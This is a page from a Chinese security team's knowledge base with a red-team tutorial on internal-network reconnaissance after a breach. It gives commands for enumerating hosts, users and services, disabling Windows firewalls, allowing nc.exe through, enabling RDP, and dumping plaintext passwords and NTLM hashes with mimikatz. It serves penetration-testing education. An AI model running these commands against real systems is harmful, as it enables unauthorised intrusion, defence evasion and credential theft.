<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>内网横向移动技巧 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/62.9c0ad8c5.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>工具手册</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>Web安全</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>攻防对抗</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/hw/" aria-current="page" title="分类简介" class="sidebar-link">分类简介</a></li><li><a href="/knowledge/hw/border-info.html" title="互联网边界打点" class="sidebar-link">互联网边界打点</a></li><li><a href="/knowledge/hw/agent.html" title="构建通道漫游内网" class="sidebar-link">构建通道漫游内网</a></li><li><a href="/knowledge/hw/host-survival-domain.html" title="域内主机存活探测" class="sidebar-link">域内主机存活探测</a></li><li><a href="/knowledge/hw/intradomain-port.html" title="域内主机端口探测方法" class="sidebar-link">域内主机端口探测方法</a></li><li><a href="/knowledge/hw/to-root.html" title="权限提升" class="sidebar-link">权限提升</a></li><li><a href="/knowledge/hw/hold-root.html" title="权限维持" class="sidebar-link">权限维持</a></li><li><a href="/knowledge/hw/transverse.html" aria-current="page" title="内网横向移动技巧" class="active sidebar-link">内网横向移动技巧</a></li><li><a href="/knowledge/hw/log-action.html" title="日志处理" class="sidebar-link">日志处理</a></li><li><a href="/knowledge/hw/2020-defend-tips.html" title="【防守方】2020攻防演练防守心得" class="sidebar-link">【防守方】2020攻防演练防守心得</a></li><li><a href="/knowledge/hw/windows-emergency-response.html" title="【防守方】Windows应急响应" class="sidebar-link">【防守方】Windows应急响应</a></li><li><a href="/knowledge/hw/linux-emergency-response.html" title="【防守方】Linux应急响应" class="sidebar-link">【防守方】Linux应急响应</a></li><li><a href="/knowledge/hw/kill-webshell.html" title="【防守方】Webshell排查" class="sidebar-link">【防守方】Webshell排查</a></li><li><a href="/knowledge/hw/purple-team.html" title="【裁判方】紫队视角看2020年络网络攻防实战演习" class="sidebar-link">【裁判方】紫队视角看2020年络网络攻防实战演习</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h1 id="内网信息收集">内网信息收集 <a href="#内网信息收集" class="header-anchor">#</a></h1> <blockquote><p><strong>信息收集的深度，直接关系到内网渗透测试结果的成败</strong></p></blockquote> <p><strong>进入内网后，红队专家一般会在本机以及内部网络 开展进一步信息收集和情报刺探工作。</strong></p> <p>包括收集当前计算机的网络连接、进程列表、命令执行历史记录、 数据库信息、当前用户信息、管理员登录信息、总结 密码规律、补丁更新频率等信息；</p> <p>同时对内网的其他机器器的IP、主机名、开放端口服务等情况进行情报刺探。</p> <p>再利用内网机器不及时修复漏洞、不做安全防护、同口令等弱点来进行横向渗透扩大战果。</p> <p>对于含有域的内网，红队专家会在扩大战果的同时 去寻找域管理员登录的蛛丝马迹。</p> <p>一旦发现某台服务 器有域管理员登录，就可以利用Mimikatz等工具去尝试获得登录账号密码明文，或者Hashdump工具去导出 NTLM哈希，继而实现对域控服务器的渗透控制。</p> <p>在内网漫游过程中，红队专家会重点关注邮件服务 器权限、OA系统权限、版本控制服务器权限、集中运维管理平台权限、统一认证系统权限、域控权限等位 置，尝试突破核心系统权限、控制核心业务、获取核心数据，最终完成目标突破工作。</p> <h2 id="本机信息收集">本机信息收集 <a href="#本机信息收集" class="header-anchor">#</a></h2> <p><strong>用户权限</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">whoami</span> /all
<span class="token comment">#查当前用户在目标系统中的具体权限</span>

quser
<span class="token comment">#查当前机器中正在线的用户,注意管理员此时在不在</span>

net user        
<span class="token comment">#查当前机器中所有的用户名</span>

net localgroup
<span class="token comment">#查当前机器中所有的组名,了解不同组的职能,如,IT,HR,ADMIN,FILE</span>

net localgroup <span class="token string">&quot;Administrators&quot;</span>
<span class="token comment">#查指定组中的成员列表</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br></div></div><p><strong>系统基本信息</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>ipconfig /all    
<span class="token comment">#获取本机网络配置</span>

systeminfo
<span class="token comment">#查看系统的基本信息（系统版本、软件及补丁的安装情况，是否在域内）</span>

net statistics workstation
<span class="token comment">#查看主机开机时间</span>

<span class="token builtin class-name">echo</span> %PROCESSOR_ARCHITECTURE%
<span class="token comment">#可查看系统的体系结构，是x86还是AMD64等</span>

tasklist
<span class="token comment">#查看本机进程列表，分析是否存在VPN杀软等进程</span>

wmic servcie list brief
<span class="token comment">#查看本机服务信息</span>

wmic startup get command,caption    
<span class="token comment">#查看程序启动信息</span>

schtasks /query /fo LIST /v
<span class="token comment">#查看系统计划任务</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br></div></div><p><strong>网络信息</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">netstat</span> -ano
<span class="token comment">#查看本机所有的tcp,udp端口连接及其对应的pid</span>

net share
<span class="token comment">#查看本机共享列表，和可访问的域共享列表</span>

wmic share get name,path,status
<span class="token comment">#利用wmic查找共享列表</span>

REG QUERY <span class="token string">&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings&quot;</span>
<span class="token comment">#查看代理配置情况</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br></div></div><p><code>wmic</code>，Windows管理工具，提供了从命令行接口和批命令脚本执行系统管理的支持。</p> <p>自xp之后系统自带</p> <p><strong>防火墙的信息和配置（配置防火墙需要管理员权限）</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#显示所有动态入站规则</span>
netsh advfirewall firewall show rule <span class="token assign-left variable">name</span><span class="token operator">=</span>all <span class="token assign-left variable">dir</span><span class="token operator">=</span>in <span class="token assign-left variable">type</span><span class="token operator">=</span>dynamic

<span class="token comment">#关闭防火墙</span>
netsh advfirewall <span class="token builtin class-name">set</span> allprofiles state off


<span class="token comment">#允许入站</span>
netsh advfirewall firewall <span class="token function">add</span> rule <span class="token assign-left variable">name</span><span class="token operator">=</span><span class="token string">&quot;pass nc&quot;</span> <span class="token assign-left variable">dir</span><span class="token operator">=</span>in <span class="token assign-left variable">action</span><span class="token operator">=</span>allow <span class="token assign-left variable">program</span><span class="token operator">=</span><span class="token string">&quot;c:<span class="token entity" title="\n">\n</span>c.exe&quot;</span>

<span class="token comment">#允许出站</span>
netsh advfirewall firewall <span class="token function">add</span> rule <span class="token assign-left variable">name</span><span class="token operator">=</span><span class="token string">&quot;Allow nc&quot;</span> <span class="token assign-left variable">dir</span><span class="token operator">=</span>out <span class="token assign-left variable">action</span><span class="token operator">=</span>allow <span class="token assign-left variable">program</span><span class="token operator">=</span><span class="token string">&quot;c:<span class="token entity" title="\n">\n</span>c.exe&quot;</span>

<span class="token comment">#3389端口放行</span>
netsh advfirewall firewall <span class="token function">add</span> rule <span class="token assign-left variable">name</span><span class="token operator">=</span><span class="token string">&quot;remote Desktop&quot;</span> <span class="token assign-left variable">protocol</span><span class="token operator">=</span>TCP <span class="token assign-left variable">dir</span><span class="token operator">=</span>in <span class="token assign-left variable">localport</span><span class="token operator">=</span><span class="token number">3389</span> <span class="token assign-left variable">action</span><span class="token operator">=</span>allow

<span class="token comment">#自定义防火墙日志存储位置</span>
netsh advfirewall <span class="token builtin class-name">set</span> currentprofile logging filename <span class="token string">&quot;c:\windows<span class="token entity" title="\t">\t</span>emp<span class="token entity" title="\f">\f</span>w.log&quot;</span>

<span class="token comment">#Server 2003及之前的版本</span>
netsh firewall <span class="token builtin class-name">set</span> opmode disable	<span class="token comment">#关闭防火墙</span>
netsh firewall <span class="token function">add</span> allowedprogram c:<span class="token punctuation">\</span>nc.exe <span class="token string">&quot;allow nc&quot;</span> <span class="token builtin class-name">enable</span>	<span class="token comment">#允许指定程序的全部连接</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br></div></div><p><strong>操作当前机器的远程桌面（RDP）连接服务（开启和关闭RDP，需要管理员权限）</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>wmic RDTOGGLE WHERE <span class="token assign-left variable">ServerName</span><span class="token operator">=</span><span class="token string">'%COMPUTERNAME%'</span> call SetAllowTSConnections <span class="token number">1</span>    
<span class="token comment">#开启</span>

wmic RDTOGGLE WHERE <span class="token assign-left variable">ServerName</span><span class="token operator">=</span><span class="token string">'%COMPUTERNAME%'</span> call SetAllowTSConnections <span class="token number">0</span>    
<span class="token comment">#关闭</span>

<span class="token comment">#下边的命令查询RDP服务的端口，返回一个十六进制的端口</span>
REG QUERY <span class="token string">&quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&quot;</span> /V PortNumber
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><h2 id="主机发现">主机发现 <a href="#主机发现" class="header-anchor">#</a></h2> <p><strong>查看各种历史记录（被动主机发现，动静小）</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#1、查看bash历史记录</span>
<span class="token function">history</span>
<span class="token function">cat</span> ~/.bash_history

<span class="token comment">#2、查看hosts文件（看域名绑定），linux &amp; windows</span>
<span class="token function">cat</span>  /etc/hosts
<span class="token builtin class-name">type</span>  c:<span class="token punctuation">\</span>Windows<span class="token punctuation">\</span>system32<span class="token punctuation">\</span>drivers<span class="token punctuation">\</span>etc<span class="token punctuation">\</span>hosts

<span class="token comment">#3、查看mstsc对内和对外连接记录</span>
https://github.com/Heart-Sky/ListRDPConnections
可能发现跨段的连接，还能定位运维人员主机

<span class="token comment">#4、浏览器浏览记录</span>
查看浏览器中访问过的内网应用
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br></div></div><p><strong>查看路由表</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">netstat</span> -r
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>基于ARP</strong></p> <p>arp可以轻易bypass掉各类应用层防火墙，除非是专业的arp防火墙</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>arp -a
<span class="token comment">#windows上查看arp缓存</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>基于ICMP</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token keyword">for</span> /L %I <span class="token keyword">in</span> <span class="token punctuation">(</span><span class="token number">1,1</span>,254<span class="token punctuation">)</span> DO @ping -w <span class="token number">1</span> -n <span class="token number">1</span> <span class="token number">192.168</span>.2.%I <span class="token operator">|</span> findstr <span class="token string">&quot;TTL=&quot;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>SPN扫描服务 （域）</strong></p> <p>每个重要的服务在域中都有对用的SPN，所以不必使用端口扫描</p> <p>只需利用SPN扫描就能找到大部分应用服务器</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#查看当前域内的所有SPN（系统命令）</span>
setspn -q */*
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>端口扫描</strong></p> <p>使用fscan扫描C段或B段的高危端口（21,22,445,3389,3306,1443,1521,6379）和Web端口</p> <h1 id="本机密码和散列值获取">本机密码和散列值获取 <a href="#本机密码和散列值获取" class="header-anchor">#</a></h1> <h2 id="lm-hash和ntml-hash">LM Hash和NTML Hash <a href="#lm-hash和ntml-hash" class="header-anchor">#</a></h2> <p>Windows操作系统中的密码由两部分加密组成，即<code>LM Hash</code>和<code>NTML Hash</code>。</p> <p>LM Hash（LAN Manager Hash），本质为DES加密，密码不足14位用<code>0</code>补全。</p> <p>自<code>Server 2003</code>之后，Windows的认证方式均为NTML Hash。</p> <p>自<code>Server 2008</code>开始默认禁用<code>LM Hash</code>， 当密码超过14位时候会采用NTLM加密</p> <p>如果抓取的<code>LM Hash</code>为 <code>AAD3B435B51404EEAAD3B435B51404EE</code>，说明密码为空或<code>LM Hash</code>被禁用。</p> <table><thead><tr><th style="text-align:left;"></th> <th style="text-align:left;">2003</th> <th style="text-align:left;">win7</th> <th style="text-align:left;">2008</th> <th style="text-align:left;">2012</th></tr></thead> <tbody><tr><td style="text-align:left;">LM</td> <td style="text-align:left;">√</td> <td style="text-align:left;"></td> <td style="text-align:left;"></td> <td style="text-align:left;"></td></tr> <tr><td style="text-align:left;">NTLM</td> <td style="text-align:left;">√</td> <td style="text-align:left;">√</td> <td style="text-align:left;">√</td> <td style="text-align:left;">√</td></tr></tbody></table> <p><strong>Hash一般存储在两个地方</strong></p> <blockquote><p><strong>SAM文件</strong>：存储在本机，对应本地用户</p> <p><strong>NTDS.DIT文件</strong>：存储在域控上，对应域用户</p></blockquote> <h2 id="获取凭证的快捷路径">获取凭证的快捷路径 <a href="#获取凭证的快捷路径" class="header-anchor">#</a></h2> <p>翻用户桌面，可能存在服务器密码信息，甚至其它服务器</p> <p>找内部wiki手册，邮箱等东西可能存在服务器IP和密码信息</p> <h2 id="server-2012-抓明文密码">Server 2012 抓明文密码 <a href="#server-2012-抓明文密码" class="header-anchor">#</a></h2> <p><strong>Server 08 及之前的版本可以直接抓明文密码</strong></p> <p>将mimikatz上传到目标主机（需要免杀），并且要SYSTEM权限。</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#读取散列值和明文密码</span>
mimikatz.exe <span class="token string">&quot;privilege::debug&quot;</span> <span class="token string">&quot;log&quot;</span> <span class="token string">&quot;sekurlsa::logonpasswords&quot;</span> <span class="token builtin class-name">exit</span> <span class="token comment">#123</span>
